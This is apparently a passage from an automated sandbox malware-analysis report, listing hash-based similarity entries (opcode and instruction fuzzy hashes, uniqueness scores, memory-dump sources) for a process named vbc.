                                              • Instruction ID: 55daff4ecba38badf6f497f580706ebbdcdf571f3fb152cbb6079385888c34ee
                                              • Opcode Fuzzy Hash: 3da50a5e5ca0ffb5633ccb237e622e82761356e0ffc5c016c5ff7c56a27bafb7
                                              • Instruction Fuzzy Hash: E911A675904280DFDB02CF14D584B19BBB1FF84324F28C6AADC094B257C33AD81ACBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e90b363a540d6931afc3b3fb36d1bc02cb611a52f7d6687d847fd557e8a76dee
                                              • Instruction ID: 4dcee513745920dc2fd8570c73e012ebb17fb5c08f5ba5aa624b249038ae8e50
                                              • Opcode Fuzzy Hash: e90b363a540d6931afc3b3fb36d1bc02cb611a52f7d6687d847fd557e8a76dee
                                              • Instruction Fuzzy Hash: CE11AF74E002199FCB44DFA8C484ADEFBB5FB48311F1185AAE918A7351D731AE51CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996664118.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_12d000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de60a4c10e059848cc64e024ded0d951be856c9c22c4e686c82988417e909f54
                                              • Instruction ID: d8b9112165f0840d78fe94f1d2ea5cb19cfb1bcd46b3ed292c07794de0d5e942
                                              • Opcode Fuzzy Hash: de60a4c10e059848cc64e024ded0d951be856c9c22c4e686c82988417e909f54
                                              • Instruction Fuzzy Hash: 6D01F2304083A0DAD7508A25F884B6BBB98EF85328F29C55AEE045A287C778DC10DBB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6db9be0ab3b6f5990c236161f82c5f149456b54359afc926b9977da76a521f17
                                              • Instruction ID: 3ba2bf7c27a67d98a159f46e3b02a7ecf63821e6f930879acd40e53c5ba5f80c
                                              • Opcode Fuzzy Hash: 6db9be0ab3b6f5990c236161f82c5f149456b54359afc926b9977da76a521f17
                                              • Instruction Fuzzy Hash: 1101DB30905288DFC711DFB4E8546AE7FB1EB4A301F10C1A9D809D3756C7385959DF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ce19869b1afb47fcc9ed1369b17f23573362a7ab3d0ac476d85a4bedefa7089d
                                              • Instruction ID: 79fe66b05c7891af920f0ea3ed13aaa1b0a6d0b3ec6fb5de8f5b5cf77382b48f
                                              • Opcode Fuzzy Hash: ce19869b1afb47fcc9ed1369b17f23573362a7ab3d0ac476d85a4bedefa7089d
                                              • Instruction Fuzzy Hash: FC01D474A442288BCF91DB64CD017EE7BB6AB9131AFD080B4D00D9B30AEF3049548B51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a60eb0b4a116c6662256a8e716206368405ee9a3db2f365d082c497b54a15c34
                                              • Instruction ID: 12bd5ec49a040377b6ec4ed7dac323c2f79a355d8bf8d56a9ddc806d267ad5c2
                                              • Opcode Fuzzy Hash: a60eb0b4a116c6662256a8e716206368405ee9a3db2f365d082c497b54a15c34
                                              • Instruction Fuzzy Hash: FF012C74D68188DFCF50DFA9D188B9CBBB0FB09304F2282A9D90897366D3745A64DF41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2682da150babc158c96395e84dad3eb98f9abf1603f0f94f9f69defbab1d846d
                                              • Instruction ID: fb68bf472257d981bcd6e339ecc65d72441cee6005eb82a8ce57e24155944901
                                              • Opcode Fuzzy Hash: 2682da150babc158c96395e84dad3eb98f9abf1603f0f94f9f69defbab1d846d
                                              • Instruction Fuzzy Hash: 0AF04F708922489FCB04FFB4985D66D7FB0EF4630AF1015ADC50DA3252DF354A95DA00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e2287d0ae2c77709b3bb8c1138b9ed1240d77672fd658c4cc783296b334db34
                                              • Instruction ID: 65774fdd45b4b0115b4c7d812603744c4ccc199f2f201452108d382f0a84095b
                                              • Opcode Fuzzy Hash: 6e2287d0ae2c77709b3bb8c1138b9ed1240d77672fd658c4cc783296b334db34
                                              • Instruction Fuzzy Hash: D2F06430D182489BEB08CFA788446EEBBB2AFC9300F24C03EC41966351DB700946CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 33351e1214aca4a096d6bd2733f7dd91c38fe60cbc725a3d6006249526344dfa
                                              • Instruction ID: 9be0b5c3fdaf47e8f06413f98dcb053ae1617c138e0687a7c10d40371ce0d342
                                              • Opcode Fuzzy Hash: 33351e1214aca4a096d6bd2733f7dd91c38fe60cbc725a3d6006249526344dfa
                                              • Instruction Fuzzy Hash: DB014B74E60148EFCB50DFA9D188A9DB7F1FB09304F2281A9D908A7325D7349E50DF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996664118.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_12d000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7a81f3d994a6cfbf997c5a1cc3f0d459d77e611faa88963d75b76ebbf89242fa
                                              • Instruction ID: 48305837053e8b5fa80b79571faa23ad56afd2d53ad4f7839e4258b5ef858896
                                              • Opcode Fuzzy Hash: 7a81f3d994a6cfbf997c5a1cc3f0d459d77e611faa88963d75b76ebbf89242fa
                                              • Instruction Fuzzy Hash: 95F062714086549AE7508E15E888B66FF98EF95734F18C45AED485B286C378DC44CBB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1600e61991753882c9e30dafd26f20968fc105d6d10f96c5b07160a6baa678e
                                              • Instruction ID: 3073042ea97f3a0c15a842d8f042366b043cfb6543d756c0a217bf3053811fff
                                              • Opcode Fuzzy Hash: e1600e61991753882c9e30dafd26f20968fc105d6d10f96c5b07160a6baa678e
                                              • Instruction Fuzzy Hash: FDF09630A05248EFC754EFA8E85876EB7B5EB49302F10C1B9E90DA3745C7346A54CF55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cb85e46937f17d4c38ed404e460b6c274fb628c200e664c6fb32df0c7327a773
                                              • Instruction ID: 6145e487fa55787c858240ac0808826c5022bbfa401b41f0865f3ac4a5460512
                                              • Opcode Fuzzy Hash: cb85e46937f17d4c38ed404e460b6c274fb628c200e664c6fb32df0c7327a773
                                              • Instruction Fuzzy Hash: ADF04470D142089BEB08CFABC8046EEBAB7BFC9300F14C03E841976350EB700A468A99
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e7a51890e088101a850cfd089c67b95b295e8cd636ac6f615dcf3eee6e9b098
                                              • Instruction ID: 3ecd398deef90b125ce343c9f957927359ef3437edf6bbcb5e1818f29cf34187
                                              • Opcode Fuzzy Hash: 3e7a51890e088101a850cfd089c67b95b295e8cd636ac6f615dcf3eee6e9b098
                                              • Instruction Fuzzy Hash: 55F03A709922489FCB04EFB5A89C56DBBB4EF4630AF1054ADC50DA7252DF314A91DA40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cc39320e293f583021ac9cc153990cfd514fde2fcf2b66cec34d0b9fb26f8884
                                              • Instruction ID: dada132cddcb840eb76c247624deae6eaf85c241bce28c618a1f737a8649ffd7
                                              • Opcode Fuzzy Hash: cc39320e293f583021ac9cc153990cfd514fde2fcf2b66cec34d0b9fb26f8884
                                              • Instruction Fuzzy Hash: B5116674901628CFCBA6CF28DD497D8BBB1BB08312F1046EAD95AA2290DB705AD4CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e58e5e011d796ac1f04cf3156f55310f2065534aa020c6c688becd37071a18f
                                              • Instruction ID: 960f2933346e1a2d581463ff50d8f989ed6f2182e09c8438e20dd4a3b51bd47d
                                              • Opcode Fuzzy Hash: 6e58e5e011d796ac1f04cf3156f55310f2065534aa020c6c688becd37071a18f
                                              • Instruction Fuzzy Hash: DBF0B4389082849FCB02CBA8C965548BFB0EB02310B2481CBCC589B3A3C3316942DB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2d0876c8e3859992cfab75ba055ecbe7faf93be7efa7b050d414ee053fbcc964
                                              • Instruction ID: 19e446fd1e1f3bcb5a38dccad1b37b04aa7c5455f83f648f3ff7289045ade616
                                              • Opcode Fuzzy Hash: 2d0876c8e3859992cfab75ba055ecbe7faf93be7efa7b050d414ee053fbcc964
                                              • Instruction Fuzzy Hash: 21F0A070904388DFCB16CFA4D5449ADBFB0EF02315F2482DED9549B2A3C7359A46DB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dc80a267a75c5f649e87a21e9d52235c435562909e937a482a09becb08f5077f
                                              • Instruction ID: 81ef7c735c1dfe78d5a87e09fdb9cbe2434eefd08148c356cd3de170ab51c249
                                              • Opcode Fuzzy Hash: dc80a267a75c5f649e87a21e9d52235c435562909e937a482a09becb08f5077f
                                              • Instruction Fuzzy Hash: 51F0E5F5C58394CBEB629F64CC40B99BAA16F26314F9401FDC4899B257E7B00D808F52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7056ba79fc07659a2ff7c0b0ec76e1fab92fe9c26508494d36d9d541b2d28982
                                              • Instruction ID: 9eb7c774578b018378798096e6776e8c0e4cbe4d381d8a37e6c93d9bacae4296
                                              • Opcode Fuzzy Hash: 7056ba79fc07659a2ff7c0b0ec76e1fab92fe9c26508494d36d9d541b2d28982
                                              • Instruction Fuzzy Hash: C9E06D341082859FC706CBA0D951959BF71EB56309F2980CAD8488B2A3C732AD47C765
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bedd16c118f5a47c4504cd9901a8dd8fbf43413db8ab6ccbdf21900b674ad606
                                              • Instruction ID: feba5aa3eeade76c589d105416f14efecc81dfa9235e433b32224ee0590a8c9d
                                              • Opcode Fuzzy Hash: bedd16c118f5a47c4504cd9901a8dd8fbf43413db8ab6ccbdf21900b674ad606
                                              • Instruction Fuzzy Hash: 26F0F474C06228CFCF629F28C8987A8B6F8FF08381F4054EAD849A6205C7355B85CF14
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c89cf73e5cfe9026f3e7ea7ba6759a7b9fc5a05bc8665bed0ce0e6f27817e06f
                                              • Instruction ID: f80bd4062b11569b574d011ec673e8796db30fe442c450621504c44f7c2258d7
                                              • Opcode Fuzzy Hash: c89cf73e5cfe9026f3e7ea7ba6759a7b9fc5a05bc8665bed0ce0e6f27817e06f
                                              • Instruction Fuzzy Hash: E2E0DF70815284EFCB01CFB0E84DAACBB789B47306F1001DEE40E632A2DB700D50CA05
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 18666cd8d17f410d1dd0d4382aae14af90988d5c1393cb1ed9058d2f4b5eb5ec
                                              • Instruction ID: e0156c0be5c582eb9ef88b5e299cd3f0c1005c12e602d8be7d63d9f3a4d81efc
                                              • Opcode Fuzzy Hash: 18666cd8d17f410d1dd0d4382aae14af90988d5c1393cb1ed9058d2f4b5eb5ec
                                              • Instruction Fuzzy Hash: DEF0153490020CEFCB01CF94D844A9DBBB1FB48305F108099ED0863351C7329A61EB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 441c80c4b3c11bcb46a1b7841a5bc966d806de943e34c06505046fb67608bcc3
                                              • Instruction ID: 34f2978a8206f58c3aedca70ca1f1f7b845b1f62309779ea0e523bef27c265f2
                                              • Opcode Fuzzy Hash: 441c80c4b3c11bcb46a1b7841a5bc966d806de943e34c06505046fb67608bcc3
                                              • Instruction Fuzzy Hash: 37F06530808284DFCB15CFE8D55496DBFB1AB02315F1442DAC8A85B393C7394A41DF55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15c37ba56bb3062ada234c8ca521e45108ec4c3c3779145c54acf710cef609f8
                                              • Instruction ID: cba4b21061323cdfb20fea585461c68ff3addc972b19399da56c9b1e7be0ba6e
                                              • Opcode Fuzzy Hash: 15c37ba56bb3062ada234c8ca521e45108ec4c3c3779145c54acf710cef609f8
                                              • Instruction Fuzzy Hash: 4DE012B4D0420CEFCB04DFA8D408A9DBBB1EB48306F1081AAD908A3311E7359A94DF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 75d26ea11762eaae49b695c610e5bd52fe75606ddc5a606ac3e8e57f90bcc7fe
                                              • Instruction ID: 034d4f436d7281bc1646aaa80be7421c8f5353007d5ba921cd90ef680fe862c4
                                              • Opcode Fuzzy Hash: 75d26ea11762eaae49b695c610e5bd52fe75606ddc5a606ac3e8e57f90bcc7fe
                                              • Instruction Fuzzy Hash: EBE0B674D0420CEFCB54EFE9D44969DBBB5EB44306F1081ADD818A3352EB359A84CF85
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0efb08888c01d8c719851f6323743473246d5dca75a1dd0481e0cef5bf26261c
                                              • Instruction ID: efc2af03ee3e4a1e9811bc977c34b5f232f6a3d993129edbdffb7843b4d3afd1
                                              • Opcode Fuzzy Hash: 0efb08888c01d8c719851f6323743473246d5dca75a1dd0481e0cef5bf26261c
                                              • Instruction Fuzzy Hash: 47E01A34D04208EFCB04DF94D454AACFBB4EB48306F24C1AEDD4863342DB359A51DB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c43d9097d4519268e3a5188062f3795587d44dcb691d9e2e69418c6ec9885163
                                              • Instruction ID: f74414a5f173521b5f796be91d00dfdfdc8ba4dbb4622a306e461ecb9c4edf55
                                              • Opcode Fuzzy Hash: c43d9097d4519268e3a5188062f3795587d44dcb691d9e2e69418c6ec9885163
                                              • Instruction Fuzzy Hash: 8DE09A34D04108EFCB04DF98D55565DF7B4EB44309F1481A99C1897341DB316A45DB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f5f270f3ff8c8e3dccdd3ea6667c9af536bb9a77992f1915fb6fd87fa4809c1
                                              • Instruction ID: 6348cc05d987ad002a44438fa4b0fb00bc0ffdec9851ab98750c21858cd80c4c
                                              • Opcode Fuzzy Hash: 7f5f270f3ff8c8e3dccdd3ea6667c9af536bb9a77992f1915fb6fd87fa4809c1
                                              • Instruction Fuzzy Hash: 53E08C38904208EBCB04DF94E845A6DFB74EB44306F2081ADDD0823342CB32AE92DB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9d8a113a3916d4c9a791f90cb0a2074c97ce22564a15558ed983c3e8683c20e
                                              • Instruction ID: c9f41b1ebcc70189ffaac65226311f2c554b2adb7651f47c898b37c78753c976
                                              • Opcode Fuzzy Hash: c9d8a113a3916d4c9a791f90cb0a2074c97ce22564a15558ed983c3e8683c20e
                                              • Instruction Fuzzy Hash: C1E0C238104104EFC709CF90D645A69BB71EB4531AF2481CDDD481B353CB33AE43CA80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 001b736b924af7820268bc0d6587119819f23b010675b1c866e3e0af3fa204c4
                                              • Instruction ID: 85fbdd314ea4e9d1404e333911287ce88809cdc28d532c137d97d21efac1b78d
                                              • Opcode Fuzzy Hash: 001b736b924af7820268bc0d6587119819f23b010675b1c866e3e0af3fa204c4
                                              • Instruction Fuzzy Hash: 83E08630444245CFCB25CFA8F54965C7BA1AB02326F1402CACD595B6A3C7720A41C751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e303e1bef3e87c050593da4fe493cdcbe20822a2df5f746785e4788d9ae021a
                                              • Instruction ID: 7fe7e45eebf49d0ac168f358957fc40242eea347e1f8e3d6610c6703827b5827
                                              • Opcode Fuzzy Hash: 0e303e1bef3e87c050593da4fe493cdcbe20822a2df5f746785e4788d9ae021a
                                              • Instruction Fuzzy Hash: 66E0E234914208EFCB40EFA8E84969DBBB4AB04206F6001A98D09A3352EB715A84CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 25e6b98313d64edc737e2b74db68d74ab504b8246464d8e9cd2345c9d7f84f38
                                              • Instruction ID: 6f63e1f560111cf4f8a260c436fd646fa3e483907cf30bda1af9b192de1d5cbb
                                              • Opcode Fuzzy Hash: 25e6b98313d64edc737e2b74db68d74ab504b8246464d8e9cd2345c9d7f84f38
                                              • Instruction Fuzzy Hash: 5EE024B8E54259CF8F10CFE5D88489CBBB0BF48310F60552AE802A7308D770A8828F01
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 61dbe52fa05f05eaaaf43da889e8f3787241b0da7e5eb7f19588d9d201221f4e
                                              • Instruction ID: 74e121432700f33b0359584c0f42ceea909b450871ced332db1ebe4c9bd72209
                                              • Opcode Fuzzy Hash: 61dbe52fa05f05eaaaf43da889e8f3787241b0da7e5eb7f19588d9d201221f4e
                                              • Instruction Fuzzy Hash: E5E0B674902669CBCBA0DF20DC4878CBBB5BF44305F0095D6D40AA2210DB701EC8DF10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0cb591a5c635416497daae8b4072b3739c0d62f6f4ad4e2338fcf3e7b1d24936
                                              • Instruction ID: dd16bd91342984d88b8121d8529eeb560e5c26cd1b976e695b93942d4c0314dc
                                              • Opcode Fuzzy Hash: 0cb591a5c635416497daae8b4072b3739c0d62f6f4ad4e2338fcf3e7b1d24936
                                              • Instruction Fuzzy Hash: 29C012B8C202498B8B00CFA5CC1008CB3B0FA05350B8041B5DC01AB308E7B01910AB85
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ad2df337c802b15bc4d3c95adf2da66c38cb97652798a55726a38843a22d903c
                                              • Instruction ID: 1edf49f6b2810c5d04c86296bf806a2fe7fd951c0c388eefa7c644c82dcad598
                                              • Opcode Fuzzy Hash: ad2df337c802b15bc4d3c95adf2da66c38cb97652798a55726a38843a22d903c
                                              • Instruction Fuzzy Hash: C1D0C578D6A159EFCF00DFA5F99489DFBB1BB08340B61552AF812A3350E7705950DB10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 762a97008b6dd75b6123656dfb145872d34be681e70ed1c1d731f228a2d2e168
                                              • Instruction ID: ecaeefe19dae00ccc9b944df6dcef071c68172cb6b0f7c2e152c624fa4b944c2
                                              • Opcode Fuzzy Hash: 762a97008b6dd75b6123656dfb145872d34be681e70ed1c1d731f228a2d2e168
                                              • Instruction Fuzzy Hash: 78D095B8D24318CF8F00CFA5D88889CBBB1BB09300B20102AD80AAB310D3701800DB01
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
